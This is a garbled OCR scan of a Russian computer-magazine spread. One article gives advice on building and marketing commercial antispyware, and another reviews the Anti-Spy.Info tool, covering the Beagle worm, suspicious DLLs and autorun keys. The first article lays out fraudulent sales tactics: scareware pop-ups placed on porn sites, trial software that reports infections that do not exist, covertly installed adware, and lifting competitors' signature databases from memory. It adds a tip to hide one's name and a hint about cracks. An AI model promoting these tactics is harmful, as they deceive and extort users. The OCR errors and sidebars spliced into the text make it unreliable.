ОНИ ЗАПЛАТЯТ ВСЕГО 29,99$, ТО ЧУДО- 
СОФТ ПОЧИСТИТ КОМПЬЮТЕР ОТ ПО- 
ШЛЯТИНЫ. ЕСТЕСТВЕННО, ДОБРОПОРЯ- 
ДОЧНЫЕ, НО ОЧЕНЬ ГЛУПЫЕ ГРАЖДАНЕ 
США, НЕ ЗАДУМЫВАЯСЬ, БЕЖАЛИ ЗА 
КРЕДИТКОЙ. ПРИЧЕМ ВСЕ ПО-ЧЕСТНО- 
МУ: СОФТ ЧИСТИЛ КЭШ И БОЛЬШЕ НЕ 
ПУГАЛ БЕДНЫХ ДРОЧЕРОВ. 


но, это не совсем честный путь, и мы его никоим 
образом не пропагандируем, но путь это суще- 
ствует, и кое-кто им пользовался. Как же они это 
делали? Конечно, эти злодеи преодолевали опре- 
деленные трудности, ведь практически все базы 
сигнатур имеют свой формат и вдобавок еще на- 
дежно зашифрованы. Они пробовали поломать 
шифр, но, в конце концов, выдергивали базу из 
памяти во время работы программы, когда она 
беззащитна как младенец. Но сделать это было не 
так легко, поэтому они искали людей, которые 
профессионально занимаются реверсингом. 

По базам вроде бы все. Ах да, совсем забыл 
сказать, не забудь ее получше зашифровать ;). 
> — функционал и украшательства. К сожале- 
нию, вся работа, что была описана выше, даже не 
дает надежды на то, что наш антизру\маге будет 
продаваться. Здесь надо еще много потрудиться, 
прежде чем обычному пользователю захочется 
кликнуть мышкой на инсталляторе программы. 

Первым делом надо разработать множество 
мелких и на первый взгляд незаметных функций, 
без которых серьезному антишпионскому ПО ни- 
куда. Самой важной из этих мелочей будет меха- 
низм обновления программы. Без апдейта не 
обойтись никак, а так как потенциальному покупа- 
телю скорее всего не захочется каждый раз сам- 
ому скачивать и класть в нужную папку файлы, то 
придется писать группу модулей, ответственных 
за это. Обязательным будет создание планиров- 
щика, который будет выполнять обновление и ска- 
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нирование по расписанию. Ну и, конечно, необхо- 
дима гибкая система настроек для того, чтобы эф- 
фективно всем этим управлять. 

Но и этого недостаточно. На мой взгляд, обя- 
зательно нужен «карантин». Представьте ситуа- 
цию, когда удаление какого либо файла или запи- 
си реестра нарушит целостность функционирова- 
ния системы. Это будет хуже, чем прыгнуть в бас- 
сейн с акулами... Этого не простят! «Карантин» по- 
зволит избавляться OT Spyware с меньшим риском, 
да и вообще придаст солидность программе. 

Так же необходим «игнор лист» и создание 
отчетов о проделанной работе. Чем больше ин- 
формации получит пользователь, тем серьезней 
ему покажется продукт, и тем большие деньги он 
будет готов за него отдать. Конечно, не стоит пе- 
ребарщивать с этим: все должно быть в пределах 
разумного, и самое главное — не должно раздра- 
жать. Можно, допустим, выводить кучу полезных 
на твой взгляд сведений, но если они загроможда- 
ют экран, то это никому не нужно. Более правиль- 
ным решением будет компактно и аккуратно вы- 
вести их в дополнительном окне. 

В каждой программе должна быть своя изю- 
минка, фишка, которая отличает ее от многих дру- 
гих. Это может быть какая-то особенная функция, 
которая претендует на уникальность. Например, 
можно написать монитор, который следит за опре- 
деленными ключами системного реестра и сооб- 
щает об этом пользователю, а еще лучше — спра- 
шивает, можно ли записать или удалить некото- 
рый ключ. Чем больше в программе будет таких 
полезностей, тем лучше она будет продаваться. 

Помимо основного функционала, можно 
сделать еще кучу всяких мелочей, которые напря- 
мую никак не относятся к назначению ПО, но бу- 
дут очень кстати. Например, можно реализовать 
пресловутые Tip of Day, причем не с подсказками 
по интерфейсу программы (он не должен быть 
слишком сложен), а с советами о том, как защи- 
титься от уничтожаемой заразы. Всяческие balo- 
оп’ы, всплывающие подсказки и прочая мишура 
тоже приветствуется, но в пределах разумного. Не 
лишним будет реализовать напоминания об обно- 
влениях файла сигнатур и самого антизру\маге, 
причем сделать это, получая данные с сайта ПО 
через интернет. Придумать можно много всего ин- 
тересного, самое главное, чтобы это было нужно 
пользователю. 

Теперь, когда разработан весь функционал 
антизру\маге, можно заняться и дизайном. Скажу 
сразу, что лучше отдать это дело в руки профес- 
сионалов. Конечно, можно сделать программу со 
скучным виндовым интерфейсом, но это допусти- 
мо лишь в том случае, если ПО претендует на 
уникальность и является фактически незамени- 
мым. А так как рынок в этой области перенасы- 
щен, то борьба за клиента должна вестись всеми 
доступными способами. Толковый дизайнер не 
только нарисует иконки и создаст макет сайта, 
но и полностью разработает концепцию внешне- 


го вида ПО. Причем на 90% будущее дизайна за- 
висит от названия: как назовешь продукт, так он 
и будет выглядеть. 

Но, конечно, амбиции дизайнеров часто 
превосходят наши возможности, и самим реали- 
зовать все детали интерфейса за приемлемое 


время практически невозможно. Есть два пути: 
заранее наложить ограничение на дизайнерский 
полет мысли или использовать «скиновые» движ- 
ки. С помощью последних можно реализовать 
любые, даже самые необычные идеи относитель- 
но внешнего вида ПО. Рассказывать обо всех 
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АНТИЗРУМ/ АВЕ? 


В прошлом году я про- 
водил тщательное изу- 
чение большого коли- 
чества антизру\маге, 
поэтому могу резюми- 
ровать состояние рын- 
ка. Анализ показывает 
некоторые тенденции: 
1 Известна масса 
продуктов, которые ло- 
BAT «ШПИОНОВ» В COO- 
kies. Делается это по 
именам или по ий вну- 
три cookie, и никакие до- 
воды здравого смысла 
о TOM, что текстовый 
файл на диске совер- 
шенно безвреден (с уче- 
том возможности от- 
ключить прием кукизов 
или чистить их) на раз- 
работчиков антизрума- 
ге не действует. Причи- 
на проста — маркетинг. 
В случае охоты на куки- 
зы antispyware будет по- 
стоянно находить сотни 
«зловредов», пугая 
бедного пользователя. 
2Поиск шпионов в 
реестре. Принцип ана- 
логичен кукизам — 
увидев ключ типа 
software\gator или clsid, 
принадлежащего 
spyware-Knaccy, почти 
все антишпионы под- 


нимают шум об обнару- 
жении ужасной заразы. 
Хотя наличие ключика 
в реестре само по себе 
не опасно — это еще 
не показатель наличия 
заразы на пк. Базы эт- 
их ключей также гуля- 
ют из одного продукта 
в другой и зачастую со- 
держат кучи ошибок. 

зПоиск файлов no 
именам. В последнее 
время становится все 
популярнее, причем ча- 
сто базы имен файлов 
разработчики воруют 
другу друга, даже не 
изучая их. Результат — 
высокий уровень лож- 
ных срабатываний и 
очень низкая эффектив- 
ность метода, поскольку 
разработчики шпионов 
далеко не дураки, и мо- 
дифицировать имена 
файлов от версии к вер- 
сии для них особого тру- 
да не составляет (равно 
как изменять Clsid своих 
классов и имена ключей 
в реестре). 

4Часто интерфейс 
перевешивает содер- 
жимое, как всегда, из- 
за маркетинга. То есть 
содержимое — про- 
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стейшая программа для 
сканирования реестра, 
зато интерфейс — от- 
менный: профессио- 
нально сделанный сайт, 
логотип и т.п. Причина 
все та же — маркетинг 
иеще раз маркетинг. 
Общий вердикт та- 
ков — эффективность 
большинства изучен- 
ных современных ан- 
TUspyware близка к Hy- 
лю, поскольку чаще 
всего преследуется за- 
дача получения некоей 
прибыли, а не постро- 
ение достойного про- 
дукта. Кроме того, 
устойчиво развивается 
идея Поах-программ - 
имитаторов наличия 
заразы, которые меня- 
ют обои, выводят ка- 
кие-либо сообщения на 
экран ит.д. Параллель- 
но они рекламируют чу- 
до-антишпион, который 
устранит все проблемы 
за определенные день- 
ги. Подобные hoax-npo- 
граммы детектируются 
большинством антиви- 
русов, а рекламируе- 
мые таким образом ан- 
тишпионы попадают 
в черные списки. 


прелестях «скины» я не буду — найдутся как их 
противники, так и сторонники, но скажу только то, 
что не надо бояться выставить программу не 
серьезной, ведь можно сказать дизайнерам, что 
примерно от них ожидается. 

Но даже если не использовать нетрадицион- 
ное оформление интерфейса, а просто наложить 
иконки на некоторые кнопки, советую эти иконки 
заказать у профессионала. К примеру, могу ска- 
зать, что маленькая картинка зонтика в Антивиру- 
се Касперского версии 6 рисовалась год!!! Так что 
не следует пренебрегать значимостью дизайна — 
это как минимум 30% успеха. 
> защита. Так как мы все-таки не благотвори- 
тельностью занимаемся, а зарабатываем себе на 
жизнь, то нужно хорошенько защититься от «до- 
брых» крэкеров. Сейчас существует масса разно- 
образных паковщиков, которые достаточно на- 
дежно сохранят содержимое кошелька програм- 
миста. Конечно, можно заняться этим делом сам- 
ому, но только в том случае, если написанная раз 
защита будет постоянно обновляться и тем самым 
противостоять посягательствам на вашу интел- 
лектуальную собственность. 

Впрочем, есть методы гораздо более дей- 
ственные и одновременно проще реализуемые. 
Например, так как антизрумаге должен постоян- 
но обновлять свои базы, то можно просто-напро- 
сто заблокировать обновления с тех ключей, ко- 
торые будут использоваться «неофициальными» 
юзерами. Отследить это очень просто, а напи- 
сать простенькую систему для аутентификации 
копий программы на сервере — еще проще. Но 
опять таки — не стоит торопиться с этим шагом. 
Как вы думаете, почему тот же Антивирус Ка- 
сперского не сделал такую бяку миллионам 
пользователей всего мира? Все очень просто — 
это секрет №2 (а для некоторых вовсе и не се- 
крет), а один из приемов раскрутки ПО, впрочем, 
о них я расскажу чуть позже. 

Подводя итог, можно сказать, что есть два 
основных типа защиты ПО: локальный и удален- 
ный. Решить, что использовать, должен выбрать 
сам разработчик. 
> | немного о продажах. Когда софт написан, 
сделан биллинг и сайт под него, и можно начинать 
продавать, сразу же возникает вопрос. Как сде- 
лать так, чтобы о вновь появившемся антизру\маге 
узнали, а самое главное — купили? Есть два спо- 
соба: честный и не совсем. Сейчас я расскажу о 
них по порядку. 

Итак, честный путь продаж подразумевает 
долгую раскрутку сайта, регистрацию в различ- 
ных софтовых каталогах и постоянную гонку за 
первое место в запросах у гугла. Если ссылка на 
наш сайт будет первой при вводе в гугле, напри- 
мер, слова «antispyware», то можно смело бро- 
сать работу — безбедная жизнь обеспечена. 
Кстати, второе и третье место в гугле тоже очень 
даже не плохи... Но все это при условии, что ПО 
будет идеально работать, обладать дружествен- 


история одного 
spyware 


НЕ TAK ДАВНО Я ПОЗНАКОМИЛСЯ С ОД- 
НИМ ЧЕЛОВЕКОМ, КОТОРЫЙ ЗАНИМАЕТ- 
СЯ РАЗРАБОТКОЙ ПО ДЛЯ ОБЕСПЕЧЕ- 
НИЯ КОМПЬЮТЕРНОЙ БЕЗОПАСНОСТИ. 
А НАЧИНАЛОСЬ ВСЕ С ТОГО, ЧТО СОБРА- 
ЛИСЬ ВМЕСТЕ ТРОЕ ДРУЗЕЙ ВЫПИТЬ ПО 
КРУЖКЕ ПИВА, И ВО ВРЕМЯ ПРАЗДНОЙ 
БЕСЕДЫ ОДИН ИЗ НИХ ЛЯПНУЛ: «А ДА- 
ВАЙТЕ СОФТ ПРОДАВАТЬ,.... 


СНАЧАЛА НАШЛИ ЕЩЕ ПАРУ ЗНАКОМЫХ, 
КОТОРЫЕ УМЕЮТ ПРОГРАММИРОВАТЬ, И 
ПРИДУМАЛИ, ЧТО ОНИ БУДУТ ПИСАТЬ. 
ВЫБОР ПАЛ НА AHTUSPYWARE. НА ПЕР- 
ВЫХ ПАРАХ ВСЕ РАБОТАЛИ НА ЧИСТОМ 
ЭНТУЗИАЗМЕ, БЕЗ ДЕНЕГ, НА СТАРЕНЬ- 
КИХ МАШИНАХ В СЪЕМНОЙ КВАРТИРЕ. 
ПОСТЕПЕННО ДЕЛО СДВИНУЛОСЬ С 
МЕРТВОЙ ТОЧКИ, И БУКВАЛЬНО ЧЕРЕЗ 
НЕСКОЛЬКО МЕСЯЦЕВ ПРОГРАММА БЫ- 
ЛА ГОТОВА. НО РЕБЯТ ПОСТИГЛА НЕУДА- 
ЧА — ПРОГРАММА ВЫШЛА ОЧЕНЬ ГЛЮЧ- 
НАЯ, И БАГРЕПОРТЫ ВАЛИЛИСЬ МЕГА- 
БАЙТАМИ. ПРИШЛОСЬ ВСЕ ПЕРЕПИСЫ- 
ВАТЬ С НУЛЯ, НО НА ЭТО РАЗ ИМ ПОМО- 
ГАЛ ИХ СОБСТВЕННЫЙ ОПЫТ, И ВТОРАЯ 
ПОПЫТКА ОКАЗАЛАСЬ КУДА УДАЧНЕЕ. 
СОФТ НАЧАЛ ПРОДАВАТЬСЯ И ПРИНО- 
СИТЬ НЕПЛОХИЕ ДЕНЬГИ. В ПОСЛЕД- 
СТВИИ БЫЛО НАПИСАНО ЕЩЕ НЕСКОЛЬ- 
КО ПОЛЕЗНЫХ ПРОГРАММ, НЕКОТОРЫЕ 
ИЗ КОТОРЫХ ПРОВАЛИЛИСЬ, А НЕКОТО- 
РЫЕ ИМЕЛИ УСПЕХ. 


СЕЙЧАС ДРУЗЬЯ РАЗБЕЖАЛИСЬ, КАЖ- 
ДЫЙ НАБРАЛ СЕБЕ СВОЮ СОБСТВЕН- 
НУЮ КОМАНДУ. МОЙ ЗНАКОМЫЙ КУПИЛ 
СЕБЕ НЕДАВНО НОВЕНЬКУЮ «ТОЙОТУ» 
И ПРИОБРЕЛ НЕХИЛУЮ КВАРТИРКУ, А 
ВЕДЬ ВСЕГО НЕСКОЛЬКО ЛЕТ НАЗАД ОН 
РАБОТАЛ СКРОМНЫМ СИСАДМИНОМ ЗА 
800 РУБЛЕЙ В МЕСЯЦ. ТАК ЧТО МЕЧТЫ 
СБЫВАЮТСЯ, ГЛАВНОЕ ПОСТАРАТЬСЯ. 


ным интерфейсом и иметь незаурядный функ- 
ционал. Но все-таки, прежде чем программа нач- 
нет приносить серьезный доход, работать при- 
дется очень много. 

Ну, с «честным» способом все понятно. Ко- 
нечно я не интернет-маркетолог, но в двух словах 
картину обрисовал. Теперь можно поговорить и о 
«немножко не честных» способах завоевания 
рынка. Первым делом скажу, что раскручивать 
сайт все равно придется, но немножко другими 
способами, гораздо более быстрыми. Нет, это не 
спам, как многие сейчас подумали. Суть заключа- 
ется в том, чтобы найти сайты с большой посеща- 
емостью и разместить там свои баннеры. Но не 
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простые сайты, а те, где тусуются богатые амери- 
канские граждане... Кто еще не догадался — это 
всяческие платные и бесплатные порносайты. 
Владельцам этих сайтов обычно обещают процент 
от прибыли, если покупка была сделана благода- 
ря их стараниям. Дальше все сделают они (если 
согласятся на это щедрое предложение и увидят 
его экономическую целесообразность). 

Как известно, тот, кто увлекается клубнич- 
кой, рано или поздно подцепит какую-либо ин- 
фекцию. Это правило действует как в реале, так 
и в онлайне. Вот как раз на этом и основан глав- 
ный прием твоих будущих партнеров. Представь, 
что во время серфинга у пользователя высвечи- 
вается страшное окно с сообщением, что его си- 
стема поражена злым вирусом, и предлагает ска- 
чать софтину для чудесного исцеления. Поверь, 
людей, поверивших в это, будет больше, чем ка- 
жется. Конечно, существуют более изощренные 
схемы, но в основе лежит именно этот принцип — 
напугать юзера. 

Если антизру\маге инсталлирован, но еще не 
куплен, а лишь проходит триальный срок, нечисто- 
плотные программисты могут задействовать инте- 
ресную фичу — постоянно выводить сообщения о 
том, что на машине водится опасная зараза, а 
уничтожить ее можно только полной версией ПО. 
Конечно, никаких Spyware может и не быть, а точ- 
нее сказать — и не будет, просто данный прием 
очень эффективен, особенно с пользователями 
типа «Домохозяйка2000». Часто люди, которые 
«гонят трафик» (владельцы сайтов, с которых 
приходят покупатели), сами пишут разнообразные 
adware, чтобы те незаметно устанавливались на 
машины их посетителей и всячески рекламирова- 
ли ПО. Но должен заметить, что такие штучки 
очень не любят в среде компьютерщиков, и авто- 
ритет продукт точно потеряет, поэтому следует хо- 
рошо подумать, прежде чем использовать такую 
стратегию продаж. А если уж все-таки решился на 
«черный пиар», то постарайся, чтобы никто не уз- 
нал твоего имени. 
>» заключительное слово. После прочтения это- 
го труда, думаю, многие поняли, что написать свой 
коммерческий антизру\маге не так уж и сложно. 
Самое главное — иметь голову на плечах, боль- 
шое желание и MSDN. Так что дерзайте! © 


Некоммерческий антизрумгаге. Сайт — так себе 
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умная слежка = — 


ОБЗОР ANTI-SPY.INFO 


АЛЬТЕРНАТИВА АНТИВИРУСАМ, БРАНДМАУЭРАМ И ПРОЧИМ 
АВТОМАТИЗИРОВАННЫМ СТОРОЖАМ — ПРОГРАММЫ, ПОЗВОЛЯЮЩИЕ ЗАГЛЯНУТЬ 
ПОД «КАПОТ» СИСТЕМЫ И САМОСТОЯТЕЛЬНО РАЗОБРАТЬСЯ В СИТУАЦИИ. АМТ|- 
SPY.INFO — ОДНА ИЗ ТАКИХ ПРОГРАММ 


Крис Касперски ака мыщъьх 
по е-тай 


Сеть буквально кишит вирусами, червями и 
шпионскими программами, приходящими из ниот- 
куда и уходящими в никуда. Правда, вместе с гига- 
байтами разрушенной информации или украден- 
ными электронными деньгами. Причем качество 
антивирусного детектирования оставляет желать 
лучшего. Старые вирусы упаковываются (переупа- 
ковываются) новыми версиями упаковщиков/про- 
текторов, слегка модифицируются или оборачива- 
ются BO «врапперы» (от англ. wrapper — обертка), 
и антивирусы перестают их распознавать. 

В процессе написания статьи мы выкачива- 
ли множество Crack'oB (большая часть из которых 
оказывалась вирусами) и «скармливали» их он- 
лайн-сканерам различных антивирусных компа- 
ний. Результат вполне оправдал ожидания: зна- 
чительная часть вирусов осталась нераспознан- 
ной. И только после ручной распаковки (снятия 
враппера) сканеры признали в них хорошо знако- 
мые Win32.HLLM.Beagle, Packed.Win32.Klone.g и 
т. д. Кстати, локальные сканеры тех же самых 
компаний справились со своей задачей намного 
лучше, лишний раз подтверждая известный тезис 
о бесплатном сыре. 

По словам разработчиков, антивирусные ба- 
зы обновляются каждые несколько часов (на са- 
мом деле это неправда), но и за это время от «све- 
жего» вируса успевают пострадать десятки, если 
не сотни тысяч пользователей. Служба поддержки 
«Лаборатории Касперского» обрабатывает при- 
сланные вирусы моментально, отвечая буквально 
через несколько часов (даже если на дворе — глу- 
бокая ночь) и обещая включить детектирование в 
следующее обновление. Причем ответ приходит на 
языке оригинала. Хочешь общаться на английском — 
пиши по-английски, и все будет ОК. Ну, или не сов- 
сем ОК. Во-первых, в нашем случае ни через нес- 
колько часов, ни даже через день онлайн-сканер 
так и не научился распознавать заразу (научился 
через полтора дня, как раз к моменту завершения 
статьи). Во-вторых, Packed.Win32.Klone.g, оберну- 
тый в новый враппер, получил название Тго]ап- 
Dropper.Win32.Agent.arz, несмотря на то, что в 
письме был явно указан механизм его действия. 
Все это косвенным образом подтверждает догад- 
ку, что уже никто не исследует вирусы, а просто до- 
бавляет в базу новую сигнатуру... 

Компания Dr.Web ответила лишь на следую- 
щий день, сообщив, что эти вирусы ей уже извест- 
ны, и никак не прокомментировала тот факт, что 
их не берет онлайн-сканер. Причем на английское 
письмо пришел русский ответ — несолидно, одна- 
ко! Ладно, воспользуемся локальными антивиру- 
сами. AVP ActiveX сканер нашел 8 вирусов в 26 no- 
раженных объектах (хотя их там было намного 
больше), а Curelt! от Dr. Web — только один, да и 
то, наверное, с перепугу или по ошибке. 
>  преамбула. Доверять антивирусам или нет — 
пускай каждый решает сам. Никто не спорит, что 
это очень хорошее средство против глобальных 
вирусных эпидемий. Но проверка программ, полу- 


«ВЕСЬ РЫНОК АНТИВИРУСОВ — ЭТО ОГРОМНЫЙ МЫЛЬНЫЙ ПУЗЫРЬ, 
КОТОРЫЙ ДЕРЖИТСЯ НА СТРАХЕ ПОЛЬЗОВАТЕЛЕЙ». 
ИГОРЬ ДАНИЛОВ, РАЗРАБОТЧИК АНТИВИРУСА DR.WEB. 


ченных из сети (особенно из ненадежных источни- 
ков типа Осла), создает лишь иллюзию безопас- 
ности. Со специально подготовленными файлами 
антивирусы не справляются в принципе! Эвристи- 
ческий анализ отдыхает, и перед запуском всякой 
неизвестной программы ее должен вручную проа- 
нализировать высококвалифицированный спе- 
циалист, умеющий держать soft-ice в руках и не 
шарахающийся в сторону от дизассемблера. Но 
специалистов мало, да и у тех времени на подоб- 
ную ерунду не хватает. 

Можно, конечно, запустить Диспетчер За- 
дач, пройтись по ветвям реестра, ответственным 
за автозагрузку, попытавшись обнаружить подоз- 
рительные файлы, но... черт возьми! Откуда про- 
стому пользователю знать, какой из них легаль- 
ный, а какой нет?! Windows содержит тысячи фай- 
лов, и еще большее количество добавляют уста- 
навливаемые приложения. Редкий специалист 
сможет сказать, какая DLL за что отвечает. 

Следовательно, необходима программа, соби- 
рающая максимум информации о системе и содер- 
жащая обширную базу данных о всех «честных» и 
«нечестных» файлах, а также обращающая внима- 
ние на особенности поведения некоторых программ 
(скрытые окна, внедрение в чужие процессы, отсут- 
ствие цифровой подписи/информации о производи- 
теле ит. д.), с возможностью временного отключе- 
ния подозрительных программ и развитой системой 
поддержки пользователей (поскольку по-другому 
создать базу обо всех файлах просто не получится). 

В далеком прошлом автор написал неслож- 
ную утилиту, трассирующую векторы прерываний 
и показывающую всех, кто на них сидит, с указа- 
нием способов внедрения (честный резидент или 
нет). Большой распространенности (по причинам 
неумелого маркетинга) она так и не получила, а с 
наступлением эры Windows оказалась и вовсе не- 
нужной, поскольку работала в реальном режиме 
MS-DOS. Но сама идея не умерла и нашла себе 
применение в новых, современных утилитах, на- 
пример, в той же Anti-Spy.Info. 
> «амбула». Программу Anti-Spy.Info можно 
бесплатно скачать с сайта www.Anti-Spy.Info, однако 
без регистрации (стоимость которой равняется 
$29) проработает всего лишь 30 дней, при этом 
часть возможностей будет заблокирована. Лекар- 
ство можно найти в Сети. 

Текущая версия имеет номер 1.6.5, но не ре- 
комендуем ей пользоваться, поскольку она упа- 
кована ASProtect'om и при активном Soft-ice про- 
сто не запустится! Кстати говоря, точно так же ве- 


дут себя вирусы/черви/шпионы, обработанные 
ASProtect'om, так что soft-ice служит своеобраз- 
ным средством защиты. 

В итоге мы использовали версию 1.1, кото- 
рая практически ничем не уступает в плане функ- 
циональности и нормально уживается вместе с 
soft-ice. Для получения наиболее полной инфор- 
мации о состоянии системы Anti-Spy.Info рекомен- 
дуется запускать с правами администратора, хотя 
большинство вирусов ловится и без них. 

После запуска видим развернутый на весь 
рабочий стол экран с именами процессов, служб, 
драйверов и компонентов IE, отсортированный по 
степени их опасности, вычисленной на основе не- 
которых не до конца понятных критериев, в ре- 
зультате чего безобидным программам сплошь и 
рядом присваивается рейтинг potentially dangerous 
(потенциально опасная), в то время как далеко не 
каждому вирусу «удается» преодолеть барьер har- 
mless (безвредный). Ho не в рейтингах дело! Глав- 
Hoe, что Anti Spy.Info отображает все процессы/би- 
блиотеки/компоненты вместе с информацией, ко- 
торую ей удалось добыть. Наша задача — ее про- 
анализировать. 
> работа с Anti-Spy.Info. В первую очередь сле- 
дует обращать внимание на появление новых 
процессов, стартующих вместе с системой (Anti- 
Зру. п в большинстве случаев корректно опре- 
деляет тип запуска), которых не было ранее. И 
это — самый эффективный способ выявления за- 
разы. Anti-Spy.Info умеет сохранять отчет в htmi- и 
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{х- форматах, но, к сожалению, не умеет сравни- 
вать их, что является большим минусом. Прихо- 
дится сравнивать отчеты вручную или писать 
свою собственную утилиту. На практике же боль- 
шинство пользователей начинают рвать волосы, 
только когда работа системы становится тормоз- 
ной, нестабильной или не запускается вообще, 
что в корне не верно. Но как отличить зара- 
женные процессы от жизненно-важных систем- 
ных файлов, после удаления которых некоторые 
приложения (а то и всю Windows целиком) при- 
дется переустанавливать заново? Сейчас прове- 
дем короткий тренинг, как это делается. 

> проверка на вшивость. Самой опасной про- 
граммой, по мнению Anti-Spy.Info, на испытуемом 
компьютере оказалась динамическая библиотека 
wmfhotfix.dll, которой был присвоен рекордно вы- 
сокий рейтинг опасности (целых 82%) на основа- 
нии следующих критериев: 


—` МОЖЕТ УПРАВЛЯТЬ ДРУГИМИ 
ПРОГРАММАМИ (И ВЕДЬ 
ДЕЙСТВИТЕЛЬНО МОЖЕТ); 


™ ОКНО НЕ ВИДИМО (А ВОТ НИЧЕГО 
ПОДОБНОГО — WMFHOTFIX.DLL НЕ ИМЕЕТ 
«СВОЕГО» ОКНА, НО ОТОБРАЖАЕТСЯ 
НА ВСЕ @У1-ПРИЛОЖЕНИЯ, ТАК ЧТО ОКОН 
У НЕЕ ПРЕДОСТАТОЧНО); 


™ НЕТ ОПИСАНИЯ ПРОГРАММЫ, ТО ЕСТЬ 
НЕ ЗАПОЛНЕН СООТВЕТСТВУЮЩИЙ 
РАЗДЕЛ РЕСУРСОВ, ЧТО СОВСЕМ 
НЕХАРАКТЕРНО ДЛЯ КОММЕРЧЕСКИХ 
ПРОДУКТОВ, НО ЧАСТО СЛУЧАЕТСЯ 
С ВИРУСАМИ И ПРОГРАММАМИ, 
НАПИСАННЫМИ НА СКОРУЮ РУКУ; 


— ЭТО НЕ СИСТЕМНЫЙ ФАЙЛ WINDOWS; 


™ ОТСУТСТВУЕТ ДЕТАЛЬНОЕ ОПИСАНИЕ 
(ЧТО ЕЩЕ ЗА ДЕТАЛЬНОЕ ОПИСАНИЕ?!). 
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Реакция Anti-Spy.Info на встречу с настоящим вирусом 
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Внешний вид программы Anti-Spy.Info 


В общем, как бы сказали в суде, мотивы неубеди- 
тельны, и за отсутствуем явных доказательств 
подсудимый отправляется на свободу. Ну, или де- 
ло направляется на доследование... 

В небольшом окне, расположенном в правом 
нижнем углу, Anti-Spy.Info показывает все тексто- 
вые строки (в формате ASCII), найденные в про- 
грамме, среди которых присутствуют «Copyright 
2006 ру Шак Guilfanov, ighexblog.com» и «http//ww.hex- 
blog.com». По HAM нетрудно догадаться, что это за- 
платка от дыры в обработчике мит{-файлов, выпу- 
щенная легендарным создателем IDA Pro — Иль- 
факом Гильфановым. Те же, кому это имя ни 
о чем не говорит, могут воспользоваться следующей 
уникальной возможностью — поиском в базе описа- 
ний файлов. Просто щелкаем по строке «Google it» в 
контекстом меню — и программа перебрасывает 
нас на форум поддержки http://www.neuber.com/antis- 
py/file, где пользователи могут оставлять свои ком- 
ментарии относительно той или иной программы. 

Комментарии встречаются самые разные: от 
технически обоснованных до откровенно пионер- 
ских. Тем не менее, некоторое представление о 


Антивирус X-Safe IV — древний, как мамонт, и ныне 
работающий только под эмулятором 
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ситуации они все-таки дают, особенно если поль- 
зователи оставляют ссылки на авторитетные ис- 
точники. В нашем случае данным файлом заинте- 
ресовались 193 пользователя, 4 из которых оце- 
нили его как безвредный, 2 — как неопасный и 
еще 2 предпочли сохранить нейтралитет. 7 оста- 
вленных комментариев в полной солидарности 
свидетельствуют, что никакой это не вирус, а не- 
зависимая заплатка для Windows. 

А теперь разберемся с динамической би- 
блиотекой SSSensor.dll, взявшейся непонятно от- 
куда, не имеющей описания, записывающей кла- 
виатурный ввод («function: record input» в окне 
«Properties», расположенным внизу посередине) и 
не включающей в себя никаких осмысленных тек- 
стовых строк, но зато импортирующей «интерес- 
ную» АР!-функцию UnhookWindowsHookExgSetWin- 
dowsHookExA, позволяющую внедряться в чужие 
программы и следить за ними, в результате чего Ап- 
ti-Spy.Info оценила рейтинг опасности в 82% (то есть 
потенциально опасная). Щелкаем по «Google it», 
идем на форум и видим, что 678 пользователей, об- 
наружившее у себя этот файл, придерживаются 
различных точек зрения на предмет его происхож- 
дения. Кто-то утверждает, что он входит в состав ан- 
тивируса Panda, кто-то — в антивирус Bullguard, 
еще встречаются упоминания персональных бран- 
дмауэров VCOM и SyGate Personal Firewall. Зная, 
что у нас установлен последний, заглянули в его ди- 
стрибутив, увидели там SSSensor.dll и успокоились. 

Судя по всему, этот модуль, выпущенный не- 
зависимой компаний, позволяет отслеживать по- 
явление Хранителя Экрана и широко использует- 
ся остальными компаниями в своих продуктах. Не 


исключено, что он «позаимствован» из какого-ни- 
будь rootkit'a (на эту мысль наводит стиль его Ha- 
писания). Но как бы там ни было, он совершенно 
безопасен и можно смело щелкнуть по пункту 
«Comment» контекстного меню и добавить свой 
собственный комментарий, чтобы не приходилось 
держать всю информацию в голове (при большом 
количестве подозрительных объектов это весьма 
проблематично). Вместе с комментарием также 
можно указать и рейтинг безопасности (в данном 
случае «harmless» — безвредная). 

После этого SSSensor.dll перескочит в са- 
мый низ списка и не будет нас отвлекать (переско- 
чит после перезапуска программы или нажатии на 
колонку Rating для пересортировки таблицы по 
степени опасности, но это уже детали). 

База «честных» программ — вот главное пре- 
имущество Anti-Spy.Info перед конкурентами. С ви- 
русами и червями, произвольным образом меняю- 
щими свои имена, дела обстоят значительно слож- 
нее. Продемонстрируем это на примере широко из- 
вестного вируса Win32.HLLM.Beagle, занимающего 
первую позицию в хит-параде у Данилова. 

Anti-Spy.Info определила, что процесс Bea- 
gle.exe с иконкой, маскирующийся под самораспако- 
вывающийся ВАВ-архив, не имеет ни окна, ни опи- 
сания, однако присвоила ей довольно низкий рей- 
тинг опасности — всего 57%. А вот файл hidrrr.exe, 
автоматически создаваемый вирусом при первом 
запуске в каталоге WINNT\System32 и прописанный 
в ветвях реестра, ответственных за автоматическую 
загрузку (HKCU\Software\Microsoft\Windows\Curren- 
tVersion\Run и HKLM\Software\Microsoft\Windows\Cur- 
rentVersion\Run), получил всего 47% («seems har- 
mless» похожа на безвредную). 

Ладно, задвинем в сторону искусственный 
интеллект со всеми его «рейтингами» и пойдем на 
форум, где мы быстро обнаружим, что файлом с 
таким именем не интересовался ни один пользо- 
ватель. Вот так номер! Практика показывает, что 
практически любой «честный» программный па- 
кет (даже малораспространенный) быстро попа- 
дает в базу Anti-Spy.Info, а если там его нет, то с 
определенной степенью вероятности можно 
утверждать, что это вирус или что-то очень нехо- 
рошее, поэтому его лучше удалить. 

Освобождая пользователя от ручной рабо- 
ты, Anti-Spy.Info поддерживает своеобразный «ка- 
рантин». При нажатии на кнопку «Удалить» выда- 
ется запрос, то ли просто можно завершить дан- 
ный процесс без каких бы то ни было дополни- 
тельных действий или переместить его в отдель- 
ную папку, попутно дезактивируя ключи автоза- 
грузки. Если, конечно, Anti-Spy.Info сумела опре- 
делить, каким путем грузится программа. К тому 
же следует помнить, что Windows блокирует уда- 
ление активных процессов, но допускает их пере- 
именование в пределах одного диска. Просто пе- 
реименуй hidrrr.exe в hidrrr.ex_— и, независимо от 
способа запуска, он уже никогда не получит упра- 
вления! Исключение составляют вирусы, следя- 


щие за своим файлом-носителем и автоматиче- 
ски восстанавливающие его в случае удаления. 

Для извлечения файла из карантина (если 
по ошибке был удален компонент честного прило- 
жения, что нарушило его работу), достаточно на- 
